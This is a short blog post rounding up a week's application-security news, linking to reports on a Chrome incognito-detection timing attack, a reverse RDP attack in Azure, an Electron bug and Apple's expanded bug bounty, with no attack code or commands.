Application Security Weekly for August 11

A researcher found out that you can discover if a user is in incognito mode in Chrome using a timing attack.

https://blog.jse.li/posts/chrome-76-incognito-filesystem-timing/

 

That Microsoft RDP attack we talked about earlier?  Yeah, it works in Azure.

https://thehackernews.com/2019/08/reverse-rdp-windows-hyper-v.html?m=1

 

In unrelated news, Microsoft has launched Azure Security Lab, a safe space to do appsec testing.

https://msrc-blog.microsoft.com/2019/08/05/azure-security-lab-a-new-space-for-azure-research-and-collaboration/

 

A cool bug was discovered in the Electron Framework.

https://www.contextis.com/en/blog/basic-electron-framework-exploitation

 

Frequent readers know that I am no fan of Apple's closed garden when it comes to app testing.  Well, it might be opening a little.  They have enhanced their bug bounty, and more importantly are going to offer quasi-jailbroken phones to researchers.  I'll be in line for that.

https://www.theverge.com/2019/8/8/20756629/apple-iphone-security-research-device-program-vulnerabilities

 

That's the news!

Add comment

Bill Sempf

Husband. Father. Pentester. Secure software composer. Brewer. Lockpicker. Ninja. Insurrectionist. Lumberjack. All words that have been used to describe me recently. I help people write more secure software.

 

 

profile for Bill Sempf on Stack Exchange, a network of free, community-driven Q&A sites

MonthList